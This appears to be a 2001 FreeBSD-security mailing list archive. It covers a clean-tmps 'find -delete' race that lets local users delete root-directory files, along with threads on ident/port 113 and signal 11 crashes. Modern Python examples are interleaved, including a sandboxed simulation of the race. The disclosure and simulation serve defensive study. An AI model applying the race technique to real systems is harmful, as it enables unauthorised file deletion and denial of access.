> > Tested in 4.3-RELEASE only:
> >
> > If /etc/periodic/daily/clean-tmps is enabled, then it's possible
> > for any local user to trick it into calling unlink() or rmdir()
> > on anything in the root directory.
> > > > The problem is that "find -delete" can be made to do chdir("..") > > multiple times followed by unlink() and/or rmdir(). > > > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL unlink(0x8051440) > > 588 find NAMI "sys" > > > > This means it can be tricked into going up too high by moving > > its current directory higher up the hierarchy, by for example > > doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is > > somewhere under "/tmp/1/2/3". > > > > The attached exploit will cause it to delete the /home -> /usr/home > > symlink. I think this would render it impossible to log into a > > system configured for non-root ssh access via DSA key only. > > > > This could also be used to unlink other users' files in /tmp > > without regard to their age. 
> > > > -- > > Nick Cleaton > > nick@cleaton.net > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DpwSv8Bofna59hYRA3aIAJ40bgRrqBeUU/KwCEWoyECin3rNIQCfeWig 3NZrJFVotoNfWFaMlUdTckA= =+kjL -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:56:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from kottan-labs.bgsu.edu (kottan-labs.bgsu.edu [129.1.148.220]) by hub.freebsd.org (Postfix) with SMTP id A854E37B424 for ; Fri, 25 May 2001 10:56:28 -0700 (PDT) (envelope-from memphis_ms@gmx.net) Received: (qmail 4356 invoked from network); 25 May 2001 13:58:51 -0400 Received: from raoul.bgsu.edu (HELO gmx.net) (129.1.148.16) by kottan-labs.bgsu.edu with RC4-MD5 encrypted SMTP; 25 May 2001 13:58:51 -0400 Message-ID: <3B0E9DA1.EC44089A@gmx.net> Date: Fri, 25 May 2001 14:00:01 -0400 From: Raoul Schroeder X-Mailer: Mozilla 4.74 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security Subject: denied P:2 packets Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I am sorry if this question has already been discussed ad infinitum... My ipfw logs logged a denied P:2 packet. What kind of protocol is P:2 ? Is this something to worry about? 
Thanks,

Raoul

From owner-freebsd-security Fri May 25 11:06:33 2001
Date: Fri, 25 May 2001 14:00:47 -0400
From: Mike Tancsa
To: Raoul Schroeder, FreeBSD Security
Subject: Re: denied P:2 packets
In-Reply-To: <3B0E9DA1.EC44089A@gmx.net>

The file /etc/protocols contains a list of.... protocols ;-)

igmp    2       IGMP    # internet group management protocol

At 02:00 PM 5/25/01 -0400, Raoul Schroeder wrote:
>Hello,
>
>I am sorry if this question has already been discussed ad infinitum...
>
>My ipfw logs logged a denied P:2 packet. What kind of protocol is P:2?
>Is this something to worry about?
>
>Thanks,
>
>Raoul

From owner-freebsd-security Fri May 25 11:08:54 2001
Date: Fri, 25 May 2001 11:08:30 -0700
From: "Steve Brown"
To: "Thomas T. Veldhouse", "Michael Tang Helmeste", freebsd-security@freebsd.org
Subject: RE: Qmail + FreeBSD 4.3
Message-ID: <027f01c0e545$b4407080$3da2169d@napanet.net>
In-Reply-To: <019b01c0e2fe$eb384d40$3028680a@tgt.com>

Same here, I have found that random sig 11's are often caused by memory or
CPU problems. One thing to try is underclocking - if you are running 133,
underclock to 100.

Steve

> -----Original Message-----
> From: Thomas T. Veldhouse
> Sent: Tuesday, May 22, 2001 1:37 PM
> To: Michael Tang Helmeste; freebsd-security@freebsd.org
> Subject: Re: Qmail + FreeBSD 4.3
>
> Swap memory and see. I had the same problem (different program). Apache
> kept dying was my first symptom. Then postfix died occasionally. MySQL
> dumped when used. A few things like that. It started happening on a system
> that had been working for the better part of a year. It was the CPU.
>
> Sig 11 more often than not is a hardware problem. There is only one case I
> know of that I can reproducibly create a sig 11 when it is not hardware. If
> you run ncftp3 against a server and download a large directory using the
> "tar on the fly" option, it will often dump core. This could be the case
> with qmail, but I have not seen it reported, thus I think he should check
> his hardware.
>
> Tom Veldhouse
>
> ----- Original Message -----
> From: "Michael Tang Helmeste"
> To: "Thomas T. Veldhouse"
> Sent: Tuesday, May 22, 2001 3:31 PM
> Subject: RE: Qmail + FreeBSD 4.3
>
> > Well, bad hardware is less likely than it's trying to overwrite memory it
> > doesn't own. If he is being attacked, and it is a buffer overflow exploit,
> > then overwriting memory it doesn't own is more likely than it being
> > repeatedly hardware, especially after his system has been working fine all
> > this time.
> >
> > -----Original Message-----
> > From: Thomas T. Veldhouse [mailto:veldy@veldy.net]
> > Sent: Tuesday, May 22, 2001 9:16 AM
> > To: Michael Tang Helmeste
> > Subject: Re: Qmail + FreeBSD 4.3
> >
> > Signal 11 (and often 10) very often signals bad hardware. Memory and/or CPU
> > are usually the cause, followed by the main board. Corruption occurs in
> > memory and a signal 11 results.
> >
> > Tom Veldhouse
> > veldy@veldy.net
> >
> > ----- Original Message -----
> > From: "Michael Tang Helmeste"
> > Sent: Monday, May 21, 2001 8:35 PM
> > Subject: RE: Qmail + FreeBSD 4.3
> >
> > > Actually it just means segmentation fault.
> > >
> > > It happens when a program accesses some memory that it doesn't own.
> > >
> > > -----Original Message-----
> > > From: Olivier Nicole
> > > Sent: Monday, May 21, 2001 9:17 PM
> > > To: subscribed@de-net.org
> > > Cc: freebsd-security@FreeBSD.ORG
> > > Subject: Re: Qmail + FreeBSD 4.3
> > >
> > > Hi Dan,
> > >
> > > Signal 11 often denotes some hardware problem I guess, something like
> > > overheating.
> > >
> > > Olivier

From owner-freebsd-security Fri May 25 11:18:05 2001
Date: Fri, 25 May 2001 14:21:34 -0400
From: Raoul Schroeder
Message-ID: <3B0EA2AE.5B00EB2@gmx.net>
To: FreeBSD Security
Subject: 'nother IPFW question

IPFW caught a TCP packet leaving my port 1119 going to another port 113.
I am a little worried about this, since there is nothing running on my
machine on 1119 that I know of.

Is there a good way of finding out what is sending on port 1119? I am
only learning about securing my box, and it is hard to find all the info
I need.

Thank you so much,

Raoul

From owner-freebsd-security Fri May 25 11:19:51 2001
Date: Fri, 25 May 2001 14:19:42 -0400
From: "alexus"
To: "Raoul Schroeder", "FreeBSD Security"
Subject: Re: 'nother IPFW question
Message-ID: <004301c0e547$450d6b80$01000001@book>
References: <3B0EA2AE.5B00EB2@gmx.net>

a sniffer would probably help..
----- Original Message -----
From: "Raoul Schroeder"
To: "FreeBSD Security"
Sent: Friday, May 25, 2001 2:21 PM
Subject: 'nother IPFW question

> IPFW caught a TCP packet leaving my port 1119 going to another port 113.
> I am a little worried about this, since there is nothing running on my
> machine on 1119 that I know of.
>
> Is there a good way of finding out what is sending on port 1119? I am
> only learning about securing my box, and it is hard to find all the info
> I need.
>
> Thank you so much,
>
> Raoul

From owner-freebsd-security Fri May 25 11:28:09 2001
Date: Fri, 25 May 2001 11:28:01 -0700 (PDT)
From: Matt Dillon
To: Raoul Schroeder
Cc: FreeBSD Security
Subject: Re: 'nother IPFW question
Message-Id: <200105251828.f4PIS1Y41320@earth.backplane.com>
References: <3B0EA2AE.5B00EB2@gmx.net>

:IPFW caught a TCP packet leaving my port 1119 going to another port 113.
:I am a little worried about this, since there is nothing running on my
:machine on 1119 that I know of.
:
:Is there a good way of finding out what is sending on port 1119? I am
:only learning about securing my box, and it is hard to find all the info
:I need.
:
:Thank you so much,
:
:Raoul

    Sounds like one of your users simply ran a pop based mail program.

                                        -Matt

From owner-freebsd-security Fri May 25 11:29:21 2001
Date: Fri, 25 May 2001 10:22:06 -0700 (PDT)
From: "tjk@tksoft.com"
To: Raoul Schroeder
Cc: FreeBSD Security
Subject: Re: 'nother IPFW question
Message-Id: <200105251722.KAA32060@smtp3.tksoft.com>
In-Reply-To: from "Raoul Schroeder" at May 25, 2001 02:21:34 PM

Raoul,

1119 was probably a randomly selected port for the outgoing connection.
Try connecting to a web server somewhere. You will always get a
different port on your local side.

Port 113 is authd. Therefore, if you have sendmail running on your
machine, the query was most likely generated by sendmail as it was
trying to establish the identity of a sender from the remote machine.
(sendmail always tries authd first. Failure to connect is not fatal.)

lsof will tell you what application is using the port.
lsof -i tcp:1119

Troy

From owner-freebsd-security Fri May 25 11:56:29 2001
Date: Fri, 25 May 2001 19:40:56 +0100
From: David Taylor
To: Matt Dillon
Subject: Re: 'nother IPFW question
Message-ID: <20010525194056.A19706@gattaca.yadt.co.uk>
In-Reply-To: <200105251828.f4PIS1Y41320@earth.backplane.com>
On Fri, 25 May 2001, Matt Dillon wrote:
>
> :IPFW caught a TCP packet leaving my port 1119 going to another port 113.
> :I am a little worried about this, since there is nothing running on my
> :machine on 1119 that I know of.
> :
> :Is there a good way of finding out what is sending on port 1119?
> [...]
>
> Sounds like one of your users simply ran a pop based mail program.
>

Wrong port, I think :)

POP is 110.

113 is auth.

Sounds like someone on a remote server connected to some port on your box,
which tried to perform an ident lookup...

As for what is 'sending on port 1119', ports which are used on the local end
of outgoing connections are essentially random, and are allocated by the
kernel when you try to create an outgoing connection.

--
David Taylor
davidt@yadt.co.uk

From owner-freebsd-security Fri May 25 12:20:18 2001
Date: Fri, 25 May 2001 12:20:06 -0700 (PDT)
From: Matt Dillon
To: "tjk@tksoft.com", Raoul Schroeder, David Taylor
Cc: FreeBSD Security
Subject: Re: 'nother IPFW question
Message-Id: <200105251920.f4PJK6L42034@earth.backplane.com>
References: <3B0EA2AE.5B00EB2@gmx.net> <200105251828.f4PIS1Y41320@earth.backplane.com> <20010525194056.A19706@gattaca.yadt.co.uk>

    Whup!  Not pop.  Auth.  It's probably sendmail.  In any case, not
    anything that generally needs to be worried about.

    I usually do not run identd, but I usually do allow the service
    through the firewall so the server not running it can respond with a
    TCP reset.  Otherwise remote sendmails using auth will stall trying
    to send email to you for ~30 seconds.  Alternatively the firewall can
    be programmed to return an ICMP error itself, but I try to avoid
    having the firewall do actual work to make it more resistant to DOS
    attacks.

                                        -Matt

:Wrong port, I think :)
:
:POP is 110.
:
:113 is auth.
:
:Sounds like someone on a remote server connected to some port on your box,
:which tried to perform an ident lookup...
:
:As for what is 'sending on port 1119', ports which are used on the local end
:of outgoing connections are essentially random, and are allocated by the
:kernel when you try to create an outgoing connection.
:
:--
:David Taylor
:davidt@yadt.co.uk

From owner-freebsd-security Fri May 25 14:49:40 2001
Date: Fri, 25 May 2001 14:49:37 -0700
From: Joe Gross
To: FreeBSD Security
Subject: Re: 'nother IPFW question
Message-ID: <20010525144937.A60462@felix.stimpy.net>
In-Reply-To: <200105251920.f4PJK6L42034@earth.backplane.com>

On Fri, May 25, 2001 at 12:20:06PM -0700, Matt Dillon wrote:
>
>     I usually do not run identd, but I usually do allow the service
>     through the firewall so the server not running it can respond with a
>     TCP reset.  Otherwise remote sendmails using auth will stall trying
>     to send email to you for ~30 seconds.  Alternatively the firewall can
>     be programmed to return an ICMP error itself, but I try to avoid
>     having the firewall do actual work to make it more resistant to DOS
>     attacks.

Augh! Why wouldn't you just have the firewall refuse the connection? It's a
bad idea to pass anything through your firewall that you don't want on your
internal network.
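The port 113 exchange this thread is arguing about, as an added example (not code from the list or from any of the posters): a minimal RFC 1413 ident client and a one-shot responder, with the client bounding its lookup the way confTO_IDENT bounds sendmail's. The socket table, user names and port pairs are constructed for the demonstration; a real identd gets that table from the kernel. The REFUSED outcome is what Matt Dillon wants to keep reachable (a TCP RST from a host with no identd, or from a firewall rule that rejects rather than drops); the TIMEOUT outcome is the stall a firewall that silently drops port 113 imposes on every remote MTA that asks.

```python
import socket
import threading

IDENT_PORT = 113          # "auth" in /etc/services: the ident protocol (RFC 1413)


def build_query(server_port, client_port):
    """Request an MTA sends to the peer's identd.

    RFC 1413 puts the port on the host being asked first and the port on
    the asking host second, as two decimal numbers separated by a comma.
    """
    return f"{server_port}, {client_port}\r\n".encode("ascii")


def parse_query(line):
    """Parse a request line into (server_port, client_port); ValueError if malformed."""
    parts = line.decode("ascii", "replace").strip().split(",")
    if len(parts) != 2:
        raise ValueError("ident query needs two ports: %r" % line)
    server_port, client_port = (int(p.strip()) for p in parts)
    for port in (server_port, client_port):
        if not 1 <= port <= 65535:
            raise ValueError("port out of range: %d" % port)
    return server_port, client_port


def answer_query(line, connections):
    """identd's reply to one request.

    `connections` is a constructed stand-in for the kernel's socket table:
    it maps (local_port, remote_port) of an established TCP connection to the
    owning user. An unparseable request is answered with INVALID-PORT and a
    zero port pair (simplification; RFC 1413 echoes the ports when it can).
    """
    try:
        server_port, client_port = parse_query(line)
    except ValueError:
        return b"0, 0 : ERROR : INVALID-PORT\r\n"
    user = connections.get((server_port, client_port))
    if user is None:
        return f"{server_port}, {client_port} : ERROR : NO-USER\r\n".encode("ascii")
    return f"{server_port}, {client_port} : USERID : UNIX : {user}\r\n".encode("ascii")


def parse_reply(line):
    """Parse one identd reply line into a dict; ValueError if it is not RFC 1413 shaped."""
    text = line.decode("ascii", "replace").strip()
    fields = [f.strip() for f in text.split(":", 3)]   # user-id may itself contain ':'
    if len(fields) < 3:
        raise ValueError("malformed ident reply: %r" % text)
    ports = fields[0].split(",")
    if len(ports) != 2:
        raise ValueError("malformed port pair: %r" % fields[0])
    reply = {"server_port": int(ports[0]), "client_port": int(ports[1]),
             "kind": fields[1].upper()}
    if reply["kind"] == "ERROR" and len(fields) == 3:
        reply["error"] = fields[2]          # INVALID-PORT, NO-USER, HIDDEN-USER, UNKNOWN-ERROR
        return reply
    if reply["kind"] == "USERID" and len(fields) == 4:
        reply["opsys"], reply["user"] = fields[2], fields[3]
        return reply
    raise ValueError("malformed ident reply: %r" % text)


def _read_line(sock, limit=1024):
    buf = b""
    while not buf.endswith(b"\n") and len(buf) < limit:
        chunk = sock.recv(256)
        if not chunk:
            break
        buf += chunk
    return buf


def ident_lookup(host, server_port, client_port, port=IDENT_PORT, timeout=5.0):
    """Ask host's identd who owns the connection, never blocking past `timeout`.

    Returns ("USERID", user), ("ERROR", error-type), ("REFUSED", None) when the
    SYN is answered with a TCP RST, or ("TIMEOUT", None) when the packets are
    silently dropped. Only the last one costs the whole timeout.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_query(server_port, client_port))
            raw = _read_line(s)
    except ConnectionRefusedError:
        return ("REFUSED", None)
    except (socket.timeout, TimeoutError):
        return ("TIMEOUT", None)
    try:
        reply = parse_reply(raw)
    except ValueError:
        return ("ERROR", "UNPARSEABLE")
    if reply["kind"] == "USERID":
        return ("USERID", reply["user"])
    return ("ERROR", reply["error"])


def serve_once(connections):
    """Start a one-shot identd on 127.0.0.1 and return the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn, srv:
            conn.sendall(answer_query(_read_line(conn), connections))

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Constructed table: the remote MTA's port 25 is talking to our port 1119.
    table = {(1119, 25): "raoul"}
    print(ident_lookup("127.0.0.1", 1119, 25, port=serve_once(table)))   # ('USERID', 'raoul')
    print(ident_lookup("127.0.0.1", 4242, 25, port=serve_once(table)))   # ('ERROR', 'NO-USER')
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                           # nothing listens here now: kernel answers with RST
    print(ident_lookup("127.0.0.1", 1119, 25, port=closed_port))         # ('REFUSED', None)
```

The drop case cannot be shown over loopback, but it is the branch that matters operationally: with a plain deny rule every remote sendmail pays the full timeout before it gives up. ipfw's `reset` action (and `unreach` for the ICMP variant) gives the peer the REFUSED outcome without passing the packet to the host, which is the middle ground between letting port 113 through and dropping it on the floor.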
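Returning to the clean-tmps advisory earlier on this page: an added simulation, not Nick Cleaton's exploit and not FreeBSD's find or fts code, of why a traversal that climbs back with chdir("..") can be steered above the tree it is cleaning, beside the same traversal returning through a directory descriptor saved before each descent. It is Python rather than C, the "mv /tmp/1/2/3 /tmp/4" is a callback fired when the walker reaches the deepest directory rather than a racing process, the tree is constructed under a temporary directory (ROOT/sys stands in for /sys, ROOT/tmp for /tmp, and both "sys" files carry an old mtime), and the three-day age threshold is an assumption.

```python
import os
import shutil
import stat
import tempfile
import time

MAX_AGE = 3 * 24 * 3600     # assumption: delete regular files untouched for 3 days


def _is_old_file(st, now):
    return stat.S_ISREG(st.st_mode) and (now - st.st_mtime) > MAX_AGE


def walk_vulnerable(deleted, now, on_enter=None):
    """Depth-first cleanup that climbs back with chdir(".."), as the affected
    find(1) did. The entry list is read once, before descending, and every
    chdir("..") simply trusts that it lands in the directory it came from."""
    for name in sorted(os.listdir(".")):
        st = os.lstat(name)
        if stat.S_ISDIR(st.st_mode):
            os.chdir(name)
            if on_enter:
                on_enter(os.getcwd())   # the concurrent "mv" is injected here
            walk_vulnerable(deleted, now, on_enter)
            os.chdir("..")              # may now be above the tree being cleaned
        elif _is_old_file(st, now):
            deleted.append(os.path.realpath(name))
            os.unlink(name)


def walk_hardened(deleted, now, on_enter=None):
    """Same traversal, but the parent is regained through a descriptor saved
    before descending, so renaming an ancestor mid-walk cannot move the walker
    above the directory it started in."""
    for name in sorted(os.listdir(".")):
        st = os.lstat(name)
        if stat.S_ISDIR(st.st_mode):
            parent_fd = os.open(".", os.O_RDONLY)
            try:
                os.chdir(name)
                if on_enter:
                    on_enter(os.getcwd())
                walk_hardened(deleted, now, on_enter)
            finally:
                os.fchdir(parent_fd)    # back to the same directory object, wherever it is now
                os.close(parent_fd)
        elif _is_old_file(st, now):
            deleted.append(os.path.realpath(name))
            os.unlink(name)


def build_tree(sandbox, now):
    """Constructed layout: ROOT/sys stands in for the real /sys, ROOT/tmp for /tmp.
    The attacker owns everything under ROOT/tmp/1, including an old file named sys."""
    root = os.path.join(sandbox, "root")
    os.makedirs(os.path.join(root, "tmp", "1", "2", "3", "a", "b"))
    old = now - 10 * 24 * 3600
    for victim in (os.path.join(root, "sys"), os.path.join(root, "tmp", "1", "sys")):
        with open(victim, "w") as f:
            f.write("x")
        os.utime(victim, (old, old))
    return root


def run_scenario(walker):
    """Run one walker over ROOT/tmp while the attacker's rename fires; report
    whether ROOT/sys survived and what was deleted, relative to ROOT."""
    now = time.time()
    sandbox = os.path.realpath(tempfile.mkdtemp())
    saved_cwd = os.getcwd()
    try:
        root = build_tree(sandbox, now)

        def attacker(cwd):
            # Stands in for "mv /tmp/1/2/3 /tmp/4" run by a local user while the
            # cleaner's working directory is /tmp/1/2/3/a/b. After the move,
            # four chdir("..") calls end in ROOT instead of ROOT/tmp/1, and the
            # pending entry "sys" from tmp/1's listing is unlinked there.
            if os.path.basename(cwd) == "b":
                os.rename(os.path.join(root, "tmp", "1", "2", "3"),
                          os.path.join(root, "tmp", "4"))

        deleted = []
        os.chdir(os.path.join(root, "tmp"))
        walker(deleted, now, attacker)
        return {
            "root_sys_survived": os.path.exists(os.path.join(root, "sys")),
            "deleted": [os.path.relpath(p, root) for p in deleted],
        }
    finally:
        os.chdir(saved_cwd)
        shutil.rmtree(sandbox, ignore_errors=True)


if __name__ == "__main__":
    print("chdir('..') walker:", run_scenario(walk_vulnerable))
    print("saved-fd walker:   ", run_scenario(walk_hardened))
```

The vulnerable walker reports ROOT/sys gone and tmp/1/sys untouched; the hardened one deletes only tmp/1/sys. The descriptor trick is one remedy; checking that the device and inode of "." after chdir("..") match those recorded on the way down is another, and either way the lesson for a root cron job is that a path-relative traversal under a world-writable directory must not trust ".." once it has descended into attacker-controlled names.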
From owner-freebsd-security Fri May 25 16:19:26 2001
Date: Fri, 25 May 2001 19:18:27 -0400
From: "Michael Tang Helmeste"
Subject: RE: Qmail + FreeBSD 4.3
In-Reply-To: <027f01c0e545$b4407080$3da2169d@napanet.net>

I guess my systems are pretty stable. I've never seemed to have any hardware
related problems like that.

-----Original Message-----
From: Steve Brown [mailto:steve@napanet.net]
Sent: Friday, May 25, 2001 2:09 PM
To: Thomas T. Veldhouse; Michael Tang Helmeste; freebsd-security@freebsd.org
Subject: RE: Qmail + FreeBSD 4.3

Same here, I have found that random sig 11's are often caused by memory or
CPU problems. One thing to try is underclocking - if you are running 133,
underclock to 100.

Steve

[...]

From owner-freebsd-security Fri May 25 17:56:35 2001
Date: Sat, 26 May 2001 07:55:34 +0700 (ICT)
From: Olivier Nicole
Message-Id:
<200105260055.HAA24510@bazooka.cs.ait.ac.th>
To: steve@napanet.net
Cc: veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG
In-reply-to: <027f01c0e545$b4407080$3da2169d@napanet.net> (steve@napanet.net)
Subject: RE: Qmail + FreeBSD 4.3

Well, shame on me, I did have a machine going sig 11 this Thursday, and
it was not a hardware problem. It was a real segmentation fault in a
piece of code I had not tested enough. Correcting the NULL pointer did
the trick. But then it was not a random error either.

Adding some cooling may help a lot too. Remember that most PC cases do
not provide adequate cooling to any component (read: disk) except the
CPU. http://www.cs.ait.ac.th/laboratory/fan/

A trick that works well: remove the memory and clean the contacts with
a rubber (eraser). Be sure you don't put rubber dirt back in the memory
slot. Be sure you don't touch the memory contacts with your fingers. It
applies also to PCI/ISA cards, as well as to CPUs that used the vertical
slot.

Best regards,

Olivier

>Same here, I have found that random sig 11's are often caused by memory or
>CPU problems.
>One thing to try is underclocking - if you are running 133,
>underclock to 100.

From owner-freebsd-security Sat May 26 13:46:47 2001
Date: Sat, 26 May 2001 22:46:38 +0200
From: sthaug@nethelp.no
To: jgross@stimpy.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: 'nother IPFW question
In-Reply-To: Your message of "Fri, 25 May 2001 14:49:37 -0700"
References: <20010525144937.A60462@felix.stimpy.net>
Message-ID: <71473.990909998@verdi.nethelp.no>

> Augh! Why wouldn't you just have the firewall refuse the connection? It's a
> bad idea to pass anything through your firewall that you don't want on your
> internal network.

If you can get your firewall to send a TCP RST, it makes sense. If your
firewall simply drops the packet, you have just introduced quite a bit of
delay in many of your email transactions (while the mail server at the
other end waits for the IDENT request to time out).
Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 26 15: 7:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8A8E837B422 for ; Sat, 26 May 2001 15:07:16 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f4QM7eo85752; Sat, 26 May 2001 18:07:41 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Sat, 26 May 2001 18:07:37 -0400 (EDT) From: Rob Simmons To: sthaug@nethelp.no Cc: jgross@stimpy.net, freebsd-security@FreeBSD.ORG Subject: Re: 'nother IPFW question In-Reply-To: <71473.990909998@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Since you cannot control other people's firewalls, you should also set the IDENT timeout to 0 seconds with the following line in /etc/mail/.mc define(`confTO_IDENT', `0s') This will prevent any delays in sending mail to a mailserver behind a firewall that blocks incoming port 113 without sending a RST. I also add an ipf rule to just send an RST if the connection was attempted to the IP address of my mailserver. All other IPs that are not running mailservices, I have set to drop the incoming port 113 traffic on the floor, since its most likely that person trying to connect is a spammer trying to relay mail off my servers. I like to waste spammer's time. :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Sat, 26 May 2001 sthaug@nethelp.no wrote: > > Augh! Why wouldn't you just have the firewall refuse the connection? 
It's a > > bad idea to pass anything through your firewall that you don't want on your > > internal network. > > If you can get your firewall to send a TCP RST, it make sense. If your > firewall simply drops the packet, you have just introduced quite a bit > of delay in many of your email transactions (while the mail server at > the other end waits for the IDENT request to timeout). > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7ECksv8Bofna59hYRA9BnAJ49rB0/wM+WpCbsLUbBFIpphSLYKwCZASbe 9T51K5J/k/a8VG3dL5i4Sm0= =M91I -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
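The drop-versus-reset delay that Steinar and Rob describe, shown as an added example that is not part of the thread: a small RFC 1413 (ident) client in Python with sendmail-style timeout semantics (a timeout of 0 means the query is never sent, which is what confTO_IDENT 0s buys you), plus a constructed one-shot ident server standing in for the remote end. Port 113, the sample reply lines and the fake server are assumptions for the demonstration. A listener that accepts but never answers approximates a firewall that silently drops port 113; a real drop stalls the client in connect() rather than recv(), with the same net effect on the querying MTA. Connecting to a local port nothing listens on produces the RST that an ipfw "reset" or ipf "return-rst" rule would send.

```python
"""RFC 1413 (ident) client showing why a dropped port-113 packet costs an
MTA its full IDENT timeout while a TCP RST costs it almost nothing.

Added example, not code from the original thread.  Port 113, the sample
reply lines and the fake server below are assumptions for the demo.
"""
import socket
import threading
import time

IDENT_PORT = 113  # assumed: the standard ident/auth port an MTA queries


def parse_ident_reply(line):
    """Parse one ident reply line (RFC 1413 section 3).

    Returns ("USERID", opsys, user_id) or ("ERROR", error_type, None);
    None if the line is not a well-formed reply.
    """
    parts = [p.strip() for p in line.strip().split(":", 3)]
    if len(parts) < 3 or "," not in parts[0]:
        return None
    kind = parts[1].upper()
    if kind == "USERID" and len(parts) == 4:
        return ("USERID", parts[2], parts[3])
    if kind == "ERROR" and len(parts) == 3:
        return ("ERROR", parts[2], None)
    return None


def ident_query(host, port_on_host, port_on_us, timeout, ident_port=IDENT_PORT):
    """Ask host's ident server who owns its end of the TCP connection
    host:port_on_host <-> us:port_on_us.

    timeout follows sendmail's confTO_IDENT: 0 (or less) means never ask.
    Returns (parsed_reply_or_None, seconds_spent).  The reply is None when
    the query was skipped, refused (RST), timed out (dropped) or malformed.
    """
    if timeout <= 0:
        return None, 0.0
    start = time.monotonic()
    result = None
    try:
        with socket.create_connection((host, ident_port), timeout=timeout) as s:
            s.sendall(f"{port_on_host}, {port_on_us}\r\n".encode("ascii"))
            result = parse_ident_reply(s.recv(1024).decode("ascii", "replace"))
    except OSError:  # ConnectionRefusedError and socket.timeout are OSErrors
        result = None
    return result, time.monotonic() - start


def closed_port():
    """Return a 127.0.0.1 port nothing listens on: connecting gets an
    immediate RST, as a firewall 'reset' / 'return-rst' rule would send."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def start_fake_ident_server(reply_line):
    """Constructed one-shot ident server on 127.0.0.1; returns its port.

    reply_line is sent verbatim once a request arrives.  None means accept
    but never answer, approximating a firewall that silently drops port 113
    (a real drop stalls the client in connect() instead; same net delay).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            try:
                conn.recv(1024)
                if reply_line is None:
                    time.sleep(3)  # stay silent longer than any client timeout
                else:
                    conn.sendall(reply_line.encode("ascii"))
            except OSError:
                pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    reply = "6191, 25 : USERID : UNIX : stjohns\r\n"  # constructed sample reply
    for label, port, to in (
        ("answering ident server", start_fake_ident_server(reply), 2.0),
        ("port 113 refused (RST)", closed_port(), 2.0),
        ("port 113 dropped (silent)", start_fake_ident_server(None), 0.5),
        ("confTO_IDENT 0s (skipped)", IDENT_PORT, 0),
    ):
        res, secs = ident_query("127.0.0.1", 6191, 25, to, ident_port=port)
        print(f"{label:28s} -> {res!s:34s} in {secs:.3f}s")
```

Running the module prints the four outcomes side by side: the refused connection fails in milliseconds, the silent peer costs the whole timeout on every inbound SMTP session, and a timeout of 0 never opens a socket. That is the whole argument for Rob's split ruleset: RST for the address that actually talks SMTP, drop everywhere else.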
The mail <Re: ipfw problems.> you sent to 박진형 (netbuilder) could not be delivered for the following reason.
--------------------------------------------
The recipient's mailbox is full. Please try again later.
--------------------------------------------